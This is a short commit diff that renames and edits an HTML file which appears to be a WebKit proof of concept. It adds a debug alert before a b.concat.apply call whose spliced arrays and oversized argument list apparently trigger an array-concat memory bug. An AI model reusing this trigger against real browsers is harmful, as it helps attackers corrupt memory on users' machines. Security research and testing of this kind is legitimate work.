Update and rename webkit1095.html to webkit1095-1.html

--- a/webkit1095-1.html
+++ b/webkit1095-1.html
@@ -19,7 +19,7 @@ var c = a.splice(0, 0xfffef); //Shorter undecided array
 args[4094] = c;
 args[4095] = q;
 
-
+alert("before concat");
 b.concat.apply(b, args);
 }catch(e){
 alert(e);
